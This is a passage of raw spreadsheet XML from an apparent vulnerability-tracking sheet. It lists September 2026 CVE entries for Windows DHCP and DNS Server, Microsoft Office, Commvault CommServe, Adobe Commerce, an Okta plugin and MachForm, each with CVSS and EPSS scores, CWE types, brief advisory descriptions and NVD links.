r="J773" s="5" t="inlineStr" /><c r="K773" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L773" s="5" t="inlineStr" /><c r="M773" s="5" t="inlineStr" /><c r="N773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O773" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P773" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q773" s="5" t="inlineStr" /><c r="R773" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S773" s="5" t="inlineStr"><is><t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T773" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t></is></c></row><row r="774"><c r="A774" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B774" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C774" s="5" t="inlineStr"><is><t>CVE-2026-77102</t></is></c><c r="D774" s="5" t="n"><v>7.5</v></c><c r="E774" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G774" s="5" t="inlineStr" /><c r="H774" s="5" t="n"><v>0.003</v></c><c r="I774" s="5" t="inlineStr" /><c r="J774" s="5" t="inlineStr" /><c r="K774" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L774" s="5" t="inlineStr" /><c r="M774" s="5" t="inlineStr" /><c r="N774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O774" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P774" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q774" s="5" t="inlineStr" /><c r="R774" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S774" s="5" t="inlineStr"><is><t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T774" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t></is></c></row><row r="775"><c r="A775" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B775" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C775" s="5" t="inlineStr"><is><t>CVE-2026-77103</t></is></c><c r="D775" s="5" t="n"><v>7.5</v></c><c r="E775" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G775" s="5" t="inlineStr" /><c r="H775" s="5" t="n"><v>0.003</v></c><c r="I775" s="5" t="inlineStr" /><c r="J775" s="5" t="inlineStr" /><c r="K775" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L775" s="5" t="inlineStr" /><c r="M775" s="5" t="inlineStr" /><c r="N775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O775" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P775" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q775" s="5" t="inlineStr" /><c r="R775" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S775" s="5" t="inlineStr"><is><t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T775" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t></is></c></row><row r="776"><c r="A776" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B776" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C776" s="5" t="inlineStr"><is><t>CVE-2026-77104</t></is></c><c r="D776" s="5" t="n"><v>7.5</v></c><c r="E776" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G776" s="5" t="inlineStr" /><c r="H776" s="5" t="n"><v>0.004</v></c><c r="I776" s="5" t="inlineStr" /><c r="J776" s="5" t="inlineStr" /><c r="K776" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L776" s="5" t="inlineStr" /><c r="M776" s="5" t="inlineStr" /><c r="N776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O776" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P776" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q776" s="5" t="inlineStr" /><c r="R776" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S776" s="5" t="inlineStr"><is><t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T776" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t></is></c></row><row r="777"><c r="A777" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B777" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C777" s="5" t="inlineStr"><is><t>CVE-2026-77108</t></is></c><c r="D777" s="5" t="n"><v>7.5</v></c><c r="E777" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F777" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G777" s="5" t="inlineStr" /><c r="H777" s="5" t="n"><v>0.005</v></c><c r="I777" s="5" t="inlineStr" /><c r="J777" s="5" t="inlineStr" /><c r="K777" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L777" s="5" t="inlineStr" /><c r="M777" s="5" t="inlineStr" /><c r="N777" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O777" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P777" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q777" s="5" t="inlineStr" /><c r="R777" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S777" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t></is></c><c r="T777" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t></is></c></row><row r="778"><c r="A778" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B778" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C778" s="5" t="inlineStr"><is><t>CVE-2026-77494</t></is></c><c r="D778" s="5" t="n"><v>7.5</v></c><c r="E778" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F778" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G778" s="5" t="inlineStr" /><c r="H778" s="5" t="n"><v>0.012</v></c><c r="I778" s="5" t="inlineStr" /><c r="J778" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K778" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L778" s="5" t="inlineStr" /><c r="M778" s="5" t="inlineStr" /><c r="N778" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O778" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P778" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q778" s="5" t="inlineStr" /><c r="R778" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S778" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T778" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t></is></c></row><row r="779"><c r="A779" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B779" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C779" s="5" t="inlineStr"><is><t>CVE-2026-77498</t></is></c><c r="D779" s="5" t="n"><v>7.5</v></c><c r="E779" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F779" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G779" s="5" t="inlineStr" /><c r="H779" s="5" t="n"><v>0.008</v></c><c r="I779" s="5" t="inlineStr" /><c r="J779" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K779" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L779" s="5" t="inlineStr" /><c r="M779" s="5" t="inlineStr" /><c r="N779" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O779" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P779" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q779" s="5" t="inlineStr" /><c r="R779" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S779" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T779" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t></is></c></row><row r="780"><c r="A780" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B780" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C780" s="5" t="inlineStr"><is><t>CVE-2026-77499</t></is></c><c r="D780" s="5" t="n"><v>7.5</v></c><c r="E780" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F780" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G780" s="5" t="inlineStr" /><c r="H780" s="5" t="n"><v>0.008999999999999999</v></c><c r="I780" s="5" t="inlineStr" /><c r="J780" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K780" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L780" s="5" t="inlineStr" /><c r="M780" s="5" t="inlineStr" /><c r="N780" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O780" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P780" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q780" s="5" t="inlineStr" /><c r="R780" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S780" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T780" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t></is></c></row><row r="781"><c r="A781" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B781" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C781" s="5" t="inlineStr"><is><t>CVE-2026-77501</t></is></c><c r="D781" s="5" t="n"><v>7.5</v></c><c r="E781" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F781" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G781" s="5" t="inlineStr" /><c r="H781" s="5" t="n"><v>0.008</v></c><c r="I781" s="5" t="inlineStr" /><c r="J781" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K781" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L781" s="5" t="inlineStr" /><c r="M781" s="5" t="inlineStr" /><c r="N781" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O781" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P781" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q781" s="5" t="inlineStr" /><c r="R781" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S781" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T781" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t></is></c></row><row r="782"><c r="A782" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B782" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C782" s="5" t="inlineStr"><is><t>CVE-2026-77502</t></is></c><c r="D782" s="5" t="n"><v>7.5</v></c><c r="E782" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F782" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G782" s="5" t="inlineStr" /><c r="H782" s="5" t="n"><v>0.008</v></c><c r="I782" s="5" t="inlineStr" /><c r="J782" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K782" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L782" s="5" t="inlineStr" /><c r="M782" s="5" t="inlineStr" /><c r="N782" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O782" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P782" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q782" s="5" t="inlineStr" /><c r="R782" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S782" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T782" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t></is></c></row><row r="783"><c r="A783" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B783" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C783" s="5" t="inlineStr"><is><t>CVE-2026-77886</t></is></c><c r="D783" s="5" t="n"><v>7.5</v></c><c r="E783" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F783" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G783" s="5" t="inlineStr" /><c r="H783" s="5" t="n"><v>0.008</v></c><c r="I783" s="5" t="inlineStr" /><c r="J783" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K783" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L783" s="5" t="inlineStr" /><c r="M783" s="5" t="inlineStr" /><c r="N783" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O783" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P783" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q783" s="5" t="inlineStr" /><c r="R783" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S783" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T783" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t></is></c></row><row r="784"><c r="A784" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B784" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C784" s="5" t="inlineStr"><is><t>CVE-2026-77888</t></is></c><c r="D784" s="5" t="n"><v>7.5</v></c><c r="E784" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F784" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G784" s="5" t="inlineStr" /><c r="H784" s="5" t="n"><v>0.008999999999999999</v></c><c r="I784" s="5" t="inlineStr" /><c r="J784" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K784" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L784" s="5" t="inlineStr" /><c r="M784" s="5" t="inlineStr" /><c r="N784" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O784" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P784" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q784" s="5" t="inlineStr" /><c r="R784" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S784" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T784" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t></is></c></row><row r="785"><c r="A785" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B785" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C785" s="5" t="inlineStr"><is><t>CVE-2026-77889</t></is></c><c r="D785" s="5" t="n"><v>7.5</v></c><c r="E785" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F785" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G785" s="5" t="inlineStr" /><c r="H785" s="5" t="n"><v>0.008999999999999999</v></c><c r="I785" s="5" t="inlineStr" /><c r="J785" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K785" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L785" s="5" t="inlineStr" /><c r="M785" s="5" t="inlineStr" /><c r="N785" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O785" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P785" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q785" s="5" t="inlineStr" /><c r="R785" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S785" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T785" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t></is></c></row><row r="786"><c r="A786" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B786" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C786" s="5" t="inlineStr"><is><t>CVE-2026-77890</t></is></c><c r="D786" s="5" t="n"><v>7.5</v></c><c r="E786" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F786" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G786" s="5" t="inlineStr" /><c r="H786" s="5" t="n"><v>0.008999999999999999</v></c><c r="I786" s="5" t="inlineStr" /><c r="J786" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K786" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L786" s="5" t="inlineStr" /><c r="M786" s="5" t="inlineStr" /><c r="N786" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O786" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P786" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q786" s="5" t="inlineStr" /><c r="R786" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S786" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T786" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t></is></c></row><row r="787"><c r="A787" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B787" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C787" s="5" t="inlineStr"><is><t>CVE-2026-77893</t></is></c><c r="D787" s="5" t="n"><v>7.5</v></c><c r="E787" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F787" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G787" s="5" t="inlineStr" /><c r="H787" s="5" t="n"><v>0.008</v></c><c r="I787" s="5" t="inlineStr" /><c r="J787" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K787" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L787" s="5" t="inlineStr" /><c r="M787" s="5" t="inlineStr" /><c r="N787" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O787" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P787" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q787" s="5" t="inlineStr" /><c r="R787" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S787" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T787" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t></is></c></row><row r="788"><c r="A788" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B788" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C788" s="5" t="inlineStr"><is><t>CVE-2026-77895</t></is></c><c r="D788" s="5" t="n"><v>7.5</v></c><c r="E788" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F788" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G788" s="5" t="inlineStr" /><c r="H788" s="5" t="n"><v>0.011</v></c><c r="I788" s="5" t="inlineStr" /><c r="J788" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K788" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L788" s="5" t="inlineStr" /><c r="M788" s="5" t="inlineStr" /><c r="N788" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O788" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P788" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q788" s="5" t="inlineStr" /><c r="R788" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S788" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T788" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t></is></c></row><row r="789"><c r="A789" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B789" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C789" s="5" t="inlineStr"><is><t>CVE-2026-77898</t></is></c><c r="D789" s="5" t="n"><v>7.5</v></c><c r="E789" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F789" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G789" s="5" t="inlineStr" /><c r="H789" s="5" t="n"><v>0.005</v></c><c r="I789" s="5" t="inlineStr" /><c r="J789" s="5" t="inlineStr" /><c r="K789" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L789" s="5" t="inlineStr" /><c r="M789" s="5" t="inlineStr" /><c r="N789" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O789" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P789" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q789" s="5" t="inlineStr" /><c r="R789" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S789" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T789" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t></is></c></row><row r="790"><c r="A790" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B790" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C790" s="5" t="inlineStr"><is><t>CVE-2026-78523</t></is></c><c r="D790" s="5" t="n"><v>7.5</v></c><c r="E790" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G790" s="5" t="inlineStr" /><c r="H790" s="5" t="n"><v>0.01</v></c><c r="I790" s="5" t="inlineStr" /><c r="J790" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K790" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L790" s="5" t="inlineStr" /><c r="M790" s="5" t="inlineStr" /><c r="N790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O790" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P790" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q790" s="5" t="inlineStr" /><c r="R790" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S790" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T790" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t></is></c></row><row r="791"><c r="A791" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B791" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C791" s="5" t="inlineStr"><is><t>CVE-2026-78574</t></is></c><c r="D791" s="5" t="n"><v>7.5</v></c><c r="E791" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F791" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G791" s="5" t="inlineStr" /><c r="H791" s="5" t="n"><v>0.001</v></c><c r="I791" s="5" t="inlineStr" /><c r="J791" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K791" s="5" t="inlineStr" /><c r="L791" s="5" t="inlineStr" /><c r="M791" s="5" t="inlineStr" /><c r="N791" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O791" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P791" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q791" s="5" t="inlineStr" /><c r="R791" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S791" s="5" t="inlineStr"><is><t>The Okta Hyperdrive Integration plugin resolves a required assembly using a registry path within the current user's hive without integrity verification. The referenced path is loaded via Assembly.LoadFrom without signature validation, resulting in an unverified assembly executing within the context of the host process or elevated installer.</t></is></c><c r="T791" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t></is></c></row><row r="792"><c r="A792" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B792" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C792" s="5" t="inlineStr"><is><t>CVE-2026-78837</t></is></c><c r="D792" s="5" t="n"><v>7.5</v></c><c r="E792" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F792" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G792" s="5" t="inlineStr" /><c r="H792" s="5" t="n"><v>0.003</v></c><c r="I792" s="5" t="inlineStr" /><c r="J792" s="5" t="inlineStr" /><c r="K792" s="5" t="inlineStr" /><c r="L792" s="5" t="inlineStr" /><c r="M792" s="5" t="inlineStr" /><c r="N792" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O792" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P792" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q792" s="5" t="inlineStr" /><c r="R792" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S792" s="5" t="inlineStr"><is><t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T792" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t></is></c></row><row r="793"><c r="A793" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B793" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C793" s="5" t="inlineStr"><is><t>CVE-2026-79377</t></is></c><c r="D793" s="5" t="n"><v>7.5</v></c><c r="E793" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F793" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G793" s="5" t="inlineStr" /><c r="H793" s="5" t="n"><v>0.004</v></c><c r="I793" s="5" t="inlineStr" /><c r="J793" s="5" t="inlineStr" /><c r="K793" s="5" t="inlineStr" /><c r="L793" s="5" t="inlineStr" /><c r="M793" s="5" t="inlineStr" /><c r="N793" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O793" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P793" s="5" 